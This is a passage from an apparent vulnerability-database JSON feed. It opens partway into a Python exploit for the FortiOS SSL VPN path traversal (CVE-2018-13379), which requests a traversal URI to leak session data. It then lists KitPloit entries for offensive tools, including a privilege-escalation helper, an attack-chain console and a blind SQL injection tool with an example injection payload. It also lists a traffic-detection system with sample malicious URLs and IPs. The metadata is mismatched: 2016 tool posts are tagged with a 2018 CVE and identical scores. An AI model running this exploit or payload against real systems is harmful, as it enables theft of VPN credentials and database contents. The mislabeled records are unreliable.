chunk: \nyield b \nelse: \nbreak \ndef parse(host): \nprint(\"[!] Parsing Information...\") \nmemory_address = 0 \nascii_string = \"\" \nfor byte in read_bytes(host): \nascii_string = ascii_string + is_printable(byte) \nif memory_address%61 == 60: \nif ascii_string!=\".............................................................\": \nprint ascii_string \nascii_string = \"\" \nmemory_address = memory_address + 1 \n \ndef check(host, port): \nprint(\"[!] Check vuln...\") \nuri = \"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\" \ntry: \nr = requests.get(\"https://\" + host + \":\" + port + uri, verify=False) \nif(r.status_code == 200): \nreturn True \nelif(r.status_code == 404): \nreturn False \nelse: \nreturn False \nexcept: \nreturn False \ndef main(host, port): \nprint(\"[+] Start exploiting....\") \nvuln = check(host, port) \nif(vuln): \nprint(\"[+] Target is vulnerable!\") \nbin_file = leak(host, port) \nelse: \nprint(\"[X] Target not vulnerable.\") \n \nif __name__ == \"__main__\": \n \nif(len(sys.argv) < 3): \nprint(\"Use: python {} ip/dns port\".format(sys.argv[0])) \nelse: \nhost = sys.argv[1] \nport = sys.argv[2] \nmain(host, port) \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/154147/fortios-disclose.txt"}], "kitploit": [{"lastseen": "2020-12-03T15:22:37", "description": "[  ](<https://2.bp.blogspot.com/-c7WH2YDlZ_U/Vo_Y4Y_pvyI/AAAAAAAAFCE/knveejJV_cY/s1600/root.jpg>)\n\n \n\n\n** RootHelper **\n\nRoothelper will aid in the process of privilege escalation on a Linux system that has been compromised, by fetching a number of enumeration and exploit suggestion scripts. The latest version downloads four scripts. Two enumeration shellscripts and two exploit suggesters, one written in perl and the other one in python. \n\nThe credits for the scripts it fetches go to the original authors. \n\n \n \n** Priv-Esc scripts ** \n\n \n \n LinEnum \n\nShellscript that enumerates the system configuration. \n\n \n \n unix-privesc-check \n\nShellscript that enumerates the system configuration and runs some privilege escalation checks as well. \n\n \n \n linuxprivchecker \n\nA python implementation to suggest exploits particular to the system that's been compromised. \n\n \n \n Linux_Exploit_Suggester \n\nA perl script that that does the same as the one mentioned above. \n \n** Usage ** \nTo use the script you will need to get it on the system you've compromised, from there you can simply run it and it will show you the options available and an informational message regarding the options. For clarity i will post it below as well. \n\n \n \n The 'Help' option displays this informational message. The 'Download' option fetches the relevant files and places them in the /tmp/ directory. The option 'Download and unzip' downloads all files and extracts the contents of zip archives to their individual subdirectories respectively, please note; if the 'mkdir' command is unavailable however, the operation will not succeed and the 'Download' option should be used instead The 'Clean up' option removes all downloaded files and 'Quit' exits roothelper. \n\nCredits for the other scripts go to their original authors. \n[ https://github.com/rebootuser/LinEnum ](<https://github.com/rebootuser/LinEnum>) \n[ https://github.com/PenturaLabs/Linux_Exploit_Suggester ](<https://github.com/PenturaLabs/Linux_Exploit_Suggester>) \n[ http://www.securitysift.com/download/linuxprivchecker.py ](<http://www.securitysift.com/download/linuxprivchecker.py>) \n[ https://github.com/pentestmonkey/unix-privesc-check ](<https://github.com/pentestmonkey/unix-privesc-check>) \n \n \n\n\n** [ Download Roothelper ](<https://github.com/NullArray/RootHelper>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-14T22:30:14", "type": "kitploit", "title": "RootHelper - A Bash Script That Downloads And Unzips Scripts That Will Aid With Privilege Escalation On A Linux System", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-14T22:30:14", "id": "KITPLOIT:119877528847056004", "href": "http://www.kitploit.com/2016/01/roothelper-bash-script-that-downloads.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T09:22:38", "description": "[  ](<https://4.bp.blogspot.com/-_LIRipoS9bk/VpATQiSNwcI/AAAAAAAAFEQ/-RhBm7m5NuE/s1600/penbox.png>)\n\n \n** PenBox ** \nA Penetration Testing Framework , The Hacker's Repo our hope is in the last version we will have evry script that a hacker needs :) \n \n** Requirements ** \n\n\n * Python 2 \n * sudoer \n \n** Versions ** \nVersion v1.1 : \n \n** Drupal_Hacking : ** \n\n\n * 1): Drupal Bing Exploiter \n * 2): Get Drupal Websites \n * 3): Drupal Mass Exploiter \n\n** Privat_Tools: **\n\n * 1) Get all websites \n * 2) Get joomla websites \n * 3) Get wordpress websites \n * 4) Find control panel \n * 5) Find zip files \n * 6) Find upload files \n * 7) Get server users \n * 8) Scan from SQL injection \n * 9) Crawl and scan from SQL injection \n * 10) Scan ports (range of ports) \n * 11) Scan ports (common ports) \n * 12) Get server banner \n * 13) Bypass Cloudflare \n\n** OS_System: **\n\n * 1) Mac OSX \n * 2) Linux ( root required ) \n * 3) Windows ( not available \"yet\" ) \n\n** Other_tools: **\n\n * jboss-autopwn \n * sqlmap \n * Shellnoob \n * Inurlbr \n * nmap \n * Setoolkit \n * Port Scanning \n * Host To IP \n * Cupp \n * Ncrack \n * Reaver \n * Ssltrip version v1.0 : \n * added some tools \n * fixed some errors \n * optimised menus and submenus \n \n** OS ** \n\n\n * This Tool Only Works On Linux And OSx \n \n \n\n\n** [ Download Penbox ](<https://github.com/x3omdax/PenBox>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-08-26T17:08:46", "type": "kitploit", "title": "Penbox - A Tool That Has All The Tools, Penetration Tester'S Repo", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2018-08-26T17:08:46", "id": "KITPLOIT:763105754466120590", "href": "http://www.kitploit.com/2016/01/penbox-tool-that-has-all-tools.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T07:27:03", "description": "[  ](<https://4.bp.blogspot.com/-qU0TZ7y-LRM/VoxK_5jzgvI/AAAAAAAAE_8/6ozD2SP7VXA/s1600/ParanoicScan.jpeg>)\n\n \n** Old Options ** \n \nGoogle &amp; Bing Scanner that also scan : \n \n\n\n * XSS \n\n * SQL GET / POST \n\n * SQL GET \n\n * SQL GET + Admin \n\n * Directory listing \n\n * MSSQL \n\n * Jet Database \n\n * Oracle \n\n * LFI \n\n * RFI \n\n * Full Source Discloure \n\n * HTTP Information \n\n * SQLi Scanner \n\n * Bypass Admin \n\n * Exploit FSD Manager \n\n * Paths Finder \n\n * IP Locate \n\n * Crack MD5 \n\n * Panel Finder \n\n * Console \n\n\n \n\n\n** Fixes ** \n \n[+] Refresh of existing pages to crack md5 \n[+] Error scanner fsd \n[+] Http error scanner scan \n[+] Spaces between text too annoying \n[+] Added array to bypass \n[+] Failed to read from file \n \n** New options ** \n \n[+] Generate all logs in a html file \n[+] Incorporates random and new useragent \n[+] Multi encoder / decoder : \n \n\n\n * Ascii \n\n * Hex \n\n * Url \n\n * Bin To Text &amp; Text To Bin \n\n[+] PortScanner \n[+] HTTP FingerPrinting \n[+] CSRF Tool \n[+] Scan XSS \n[+] Generator for XSS Bypass \n[+] Generator links to tiny url \n[+] Finder and downloader exploits on Exploit-DB \n[+] Mysql Manager \n[+] Tools LFI \n** \n** ** An video ** \n \n \n\n\n** [ Download Paranoicscan ](<https://github.com/DoddyHackman/ParanoicScan>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-06T21:59:10", "type": "kitploit", "title": "ParanoicScan - Vulnerability Scanner", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-06T21:59:10", "id": "KITPLOIT:5829195600312197311", "href": "http://www.kitploit.com/2016/01/paranoicscan-vulnerability-scanner.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T09:22:41", "description": "[  ](<https://3.bp.blogspot.com/-r4AyBrfXG3E/Vo83D2vXPvI/AAAAAAAAFBA/K8lP-y7KJ4Q/s1600/SAML%2BRaider.png>)\n\n \n\n\nSAML Raider is a Burp Suite extension for testing SAML infrastructures. It contains two core functionalities: Manipulating SAML Messages and manage X.509 certificates. \n\n \n\n\nThis software was created by Roland Bischofberger and Emanuel Duss during a bachelor thesis at the [ Hochschule f\u00fcr Technik Rapperswil ](<https://www.hsr.ch/>) (HSR). Our project partner and advisor was [ Compass Security Schweiz AG ](<https://www.csnc.ch/>) . We thank Compass for the nice collaboration and support during our bachelor thesis. \n\n \n** Features ** \nThe extension is divided in two parts. A SAML message editor and a certificate management tool. \n \n** Message Editor ** \nFeatures of the SAML Raider message editor: \n\n\n * Sign SAML Messages \n * Sign SAML Assertions \n * Remove Signatures \n * Edit SAML Message \n * Preview eight common XSW Attacks \n * Execute eight common XSW Attacks \n * Send certificate to SAMl Raider Certificate Management \n * Undo all changes of a SAML Message \n * Supported Profiles: SAML Webbrowser Single Sign-on Profile, Web Services Security SAML Token Profile \n * Supported Bindings: POST Binding, Redirect Binding, SOAP Binding \n \n** Certificate Management ** \nFeatures of the SAML Raider Certificate Management: \n\n\n * Import X.509 certificates (PEM and DER format) \n * Import X.509 certificate chains \n * Export X.509 certificates (PEM format) \n * Delete imported X.509 certificates \n * Display informations of X.509 certificates \n * Import private keys (PKCD#8 in DER format and traditional RSA in PEM Format) \n * Export private keys (traditional RSA Key PEM Format) \n * Cloning X.509 certificates \n * Cloning X.509 certificate chains \n * Create new X.509 certificates \n * Editing and self-sign existing X.509 certificates \n \n** Installation ** \n \n** Manual Installation ** \nStart the Burp Suite and click at the ` Extender ` tab on ` Add ` . Choose the SAML Raider JAR file to install the extension. \n \n** Installation from BApp Store ** \nThe easy way to install SAML Raider is using the BApp Store. Open Burp and click in the ` Extender ` tab on the ` BApp Store ` tab. Select ` SAML Raider ` and hit the ` Install ` button to install our extension. \nDon't forget to rate our extension with as many stars you like. \n \n** Usage ** \nTo test SAML environments more comfortable, you could add a intercept rule in the proxy settings. Add a new rule which checks if a Parameter Name ` SAMLResponse ` is in the request. We hope the usage of our extension is mostly self explaining. \n \n** Development ** \n \n** Build ** \nClone the repository and build the JAR file using Maven: \n\n \n \n $ mvn install \n\nUse the JAR file in ` target/saml-raider-1.0-SNAPSHOT-jar-with-dependencies.jar ` as a Burp extension. \n \n** Run SAML Raider inside Eclipse ** \nTo start the Extension directly from Eclipse, import the Repository into Eclipse. Note that the Eclipse Maven Plugin ` m2e ` is required. \nPlace the Burp Suite JAR file into the ` lib ` folder and add the Burp JAR as a Library in the Eclipse Project ( ` Properties ` \u2192 ` Build Path ` \u2192 ` Libraries ` ). \nOpen the Burp JAR under ` Referenced Libraries ` in the Package Explorer and right click in the Package ` burp ` on ` StartBurp.class ` and select ` Run As... ` \u2192 ` Java Application ` to start Burp and load the Extension automatically. \n \n** Debug Mode ** \nTo enable the Debug Mode, set the ` DEBUG ` Flag in the Class ` Flags ` from the Package ` helpers ` to ` true ` . This will write all output to the ` SAMLRaiderDebug.log ` logfile and load example certificates for testing. \n \n** Test with fake SAML Response ** \nTo send a SAML Response to Burp, you can use the script ` samltest ` in the ` scripts/samltest ` directory. It sends the SAML Response from ` saml_response ` to Burp ( ` localhost:8080 ` ) and prints out the modified response from our plugin. \n\n\n \n \n\n\n** [ Download Samlraider ](<https://github.com/SAMLRaider/SAMLRaider>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-09T17:35:02", "type": "kitploit", "title": "SAML Raider - SAML2 Burp Extension", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-09T17:35:02", "id": "KITPLOIT:5397133847150975825", "href": "http://www.kitploit.com/2016/01/saml-raider-saml2-burp-extension.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T07:27:51", "description": "[  ](<https://3.bp.blogspot.com/-k9Vmaf5cAn8/Vo_oT-iqyGI/AAAAAAAAFCw/5sZ7TlaL5LM/s1600/Project%2BArsenal%2BX.jpeg>)\n\n \n** Project Arsenal X ** \nNew version of my Arsenal X written in Delphi with the following options: \n \n[+] Gmail Inbox \n[+] Whois Client \n[+] Table \n[+] Downloader \n[+] Get IP \n[+] Locate IP \n[+] K0bra SQLI Scanner \n[+] Crack multiple hashes \n[+] Search admin panel \n[+] Port Scanner \n[+] Multi Cracker with support for FTP, TELNET, POP3 \n[+] Execution of commands in the console \n \n** An video : ** \n \n \n\n\n** [ Download Project Arsenal X ](<https://github.com/DoddyHackman/Arsenal_X>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-18T00:48:17", "type": "kitploit", "title": "Project Arsenal X - As HackTheGame But Real", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-18T00:48:17", "id": "KITPLOIT:816704453339226193", "href": "http://www.kitploit.com/2016/01/project-arsenal-x-as-hackthegame-but.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T15:26:46", "description": "[  ](<https://3.bp.blogspot.com/-0ykNvRCsIbA/Vo9M4RZq4lI/AAAAAAAAFB0/0ABRvwPqasU/s1600/killchain2.png>)\n\n \n \n** \u201cKill Chain\u201d is a unified console with an anonymizer that will perform these stages of attacks: ** \n\n\n * Reconnaissance \n\n * Weaponization \n\n * Delivery \n\n * Exploit \n\n * Installation \n\n * Command &amp; Control \n\n * And Actions \n \n** Dependant tool sets are: ** \n1) Tor -- For the console build in anonymizer. \n2) Set -- Social-Engineer Toolkit (SET), attacks against humans. \n3) OpenVas -- Vulnerability scanning and vulnerability management. \n4) Veil-Evasion -- Generate metasploit payloads bypass anti-virus. \n5) Websploit -- WebSploit Advanced MITM Framework. \n6) Metasploit -- Executing exploit code against target. \n7) WiFite -- Automated wireless auditor, designed for Linux. \n \n \n\n\n** [ Download Killchain ](<https://github.com/ruped24/killchain>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-13T22:21:08", "type": "kitploit", "title": "Killchain - A Unified Console To Perform The \"Kill Chain\" Stages Of Attacks", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-13T22:21:08", "id": "KITPLOIT:2722328714476257207", "href": "http://www.kitploit.com/2016/01/killchain-unified-console-to-perform.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T21:29:17", "description": "[  ](<https://3.bp.blogspot.com/-Nwco4gG9BGQ/Vo8z8IY2dKI/AAAAAAAAFA0/V49lKsfoWuQ/s1600/mailtrail_main.png>)\n\n \n\n\n** Maltrail ** is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists, where trail can be anything from domain name (e.g. ` zvpprsensinaix.com ` for [ Banjori ](<http://www.johannesbader.ch/2015/02/the-dga-of-banjori/>) malware), URL (e.g. ` http://109.162.38.120/harsh02.exe ` for known malicious [ executable ](<https://www.virustotal.com/en/file/61f56f71b0b04b36d3ef0c14bbbc0df431290d93592d5dd6e3fffcc583ec1e12/analysis/>) ) or IP address (e.g. ` 103.224.167.117 ` for known attacker). Also, it has (optional) advanced heuristic mechanisms that can help in discovery of unknown threats (e.g. new malware). \n\n \nThe following (black)lists (i.e. feeds) are being utilized: \n\n \n \n alienvault, autoshun, badips, bambenekconsultingc2, bambenekconsultingdga, binarydefense, bitcoinnodes, blocklist, botscout, bruteforceblocker, ciarmy, cruzit, cybercrimetracker, dshielddns, dshieldip, emergingthreatsbot, emergingthreatscip, emergingthreatsdns, feodotrackerdns, feodotrackerip, greensnow, malwarepatrol, malwareurlsnormal, maxmind, myip, nothink, openbl, openphish, palevotracker, proxylists, proxyrss, proxy, riproxies, rutgers, sblam, snort, socksproxy, sslipbl, sslproxies, torproject, torstatus, voipbl, vxvault, zeustrackerdns, zeustrackerip, zeustrackermonitor, zeustrackerurl, etc. \n\nAs of static entries, the trails for the following malicious entities (e.g. malware C&amp;Cs) have been manually included (from various AV reports): \n\n \n \n alureon, android_stealer, angler, aridviper, axpergle, babar, balamid, bamital, bankpatch, bedep, black_vine, bubnix, carbanak, careto, casper, chewbacca, cleaver, conficker, cosmicduke, couponarific, crilock, cryptolocker, cryptowall, ctblocker, darkhotel, defru, desertfalcon, destory, dorifel, dorkbot, dridex, dukes, dursg, dyreza, emotet, equation, evilbunny, expiro, fakeran, fareit, fbi_ransomware, fiexp, fignotok, fin4, finfisher, gamarue, gauss, htran, jenxcus, kegotip, kovter, lollipop, lotus_blossom, luckycat, mariposa, miniduke, modpos, nbot, nettraveler, neurevt, nitol, nonbolqu, nuqel, nwt, nymaim, palevo, pdfjsc, pift, plugx, ponmocup, powelike, proslikefan, pushdo, ransirac, redoctober, reveton, russian_doll, sality, sathurbot, scieron, sefnit, shylock, siesta, simda, sinkhole_1and1, sinkhole_abuse, sinkhole_blacklistthisdomain, sinkhole_certpl, sinkhole_drweb, sinkhole_fbizeus, sinkhole_fitsec, sinkhole_georgiatech, sinkhole_kaspersky, sinkhole_microsoft, sinkhole_shadowserver, sinkhole_sinkdns, sinkhole_zinkhole, skyper, smsfakesky, snake, snifula, sofacy, stuxnet, teerac, teslacrypt, torpig, torrentlocker, unruy, upatre, vawtrak, virut, vobfus, volatile_cedar, vundo, waterbug, zeroaccess, zlob, etc. \n\n \n** Architecture ** \nMaltrail is based on the ** Sensor ** &lt;-&gt; ** Server ** &lt;-&gt; ** Client ** architecture. ** Sensor ** (s) is a standalone component running on the monitoring node (e.g. Linux platform connected passively to the SPAN/mirroring port or transparently inline on a Linux bridge) or at the standalone machine (e.g. Honeypot) where it \"sniffs\" the passing traffic for blacklisted items/trails (i.e. domain names, URLs and/or IPs). In case of a positive match, it sends the event details to the (central) ** Server ** where they are being stored inside the appropriate logging directory (i.e. ` LOG_DIR ` described in the _ Configuration _ section). If ** Sensor ** is being run on the same machine as ** Server ** (default configuration), logs are stored directly into the local logging directory. Otherwise, they are being sent via UDP messages to the remote server (i.e. ` LOG_SERVER ` described in the _ Configuration _ section). \n \n\n\n[  ](<https://2.bp.blogspot.com/-w31xkGAuj0s/Vo8ztFwxqeI/AAAAAAAAFAs/TsC7v-yZZAs/s1600/mailtrail.png>)\n\n \n** Server ** 's primary role is to store the event details and provide back-end support for the reporting web application. In default configuration, server and sensor will run on the same machine. So, to prevent potential disruptions in sensor activities, the front-end reporting part is based on the [ \"Fat client\" ](<https://en.wikipedia.org/wiki/Fat_client>) architecture (i.e. all data post-processing is being done inside the client's web browser instance). Events (i.e. log entries) for the chosen (24h) period are transferred to the ** Client ** , where the reporting web application is solely responsible for the presentation part. Data is sent toward the client in compressed chunks, where they are processed sequentially. The final report is created in a highly condensed form, practically allowing presentation of virtually unlimited number of events. \nNote: ** Server ** component can be skipped altogether, and just use the standalone ** Sensor ** . In such case, all events would be stored in the local logging directory, while the log entries could be examined either manually or by some CSV reading application. \n \n** Quick start ** \nThe following set of commands should get your Maltrail ** Sensor ** up and running (out of the box with default settings and monitoring interface \"any\"): \n\n \n \n sudo apt-get install python-pcapy \u00a0\n \n \n git clone https://github.com/stamparm/maltrail.git \u00a0\n \n \n cd maltrail \u00a0\n \n \n sudo python sensor.py \n\n \n \n\n\n** [ Download Maltrail ](<https://github.com/stamparm/maltrail>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-10T05:20:46", "type": "kitploit", "title": "Maltrail - Malicious Traffic Detection System", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-10T05:20:46", "id": "KITPLOIT:5563730483162396602", "href": "http://www.kitploit.com/2016/01/maltrail-malicious-traffic-detection.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-02T21:52:59", "description": "[  ](<https://1.bp.blogspot.com/-nsWPZmYADO0/Vo9KdyeALAI/AAAAAAAAFBo/Bo1VqnKaOXA/s1600/BSQLinjector.png>)\n\n \n\n\nBSQLinjector uses blind method to retrieve data from SQL databases. I recommend using \"--test\" switch to clearly see how configured payload looks like before sending it to an application. \n\n \n\n\n** Options: **\n\n \n\n\n\\--file Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.txt) \n\n \n\n\n\\--pattern Mandatory - Pattern to look for when query is true. (--pattern=truestatement) \n\n \n\n\n\\--prepend Mandatory - Main payload. (--prepend=\"abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,\" \n \n\\--append How to end our payload. For example comment out rest of SQL statement. (--append='# \n\n \n\n\n\\--2ndfile File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt) \n\n \n\n\n\\--mode Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using \"&lt;\", \"&gt;\", \"=\" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l) \n \n\\--hex Use hex to compare instead of characters. \n \n\\--case Case sensitivity. \n\n \n\n\n\\--ssl Use SSL. \n \n\\--proxy Proxy to use. (--proxy=127.0.0.1:8080) \n\n \n\n\n\\--test Enable test mode. Do not send request, just show full payload. \n \n\\--comma Encode comma. \n\n \n\n\n\\--bracket Add brackets to the end of substring function. --bracket=\"))\" \n\n \n\n\n\\--schar Character placed around chars. This character is not used while in hex mode. (--schar=\"'\") \n\n \n\n\n\\--special Include all special characters in enumeration. \n \n\\--start Start enumeration from specified character. (--start=10) \n \n\\--max Maximum characters to enumerate. (--max=10) \n\n \n\\--timeout Timeout in waiting for responses. (--timeout=20) \n\n \n\\--verbose Show verbose messages. \n\n \n\n\n** Example usage: **\n \n \n ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --prepend=\"abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,\" --append=\"'#\" --ssl\n\n \n \n\n\n** [ Download Bsqlinjector ](<https://github.com/enjoiz/BSQLinjector>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-12T22:02:07", "type": "kitploit", "title": "BSQLinjector - Blind SQL Injection Exploitation Tool", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-12T22:02:07", "id": "KITPLOIT:1244156083583318186", "href": 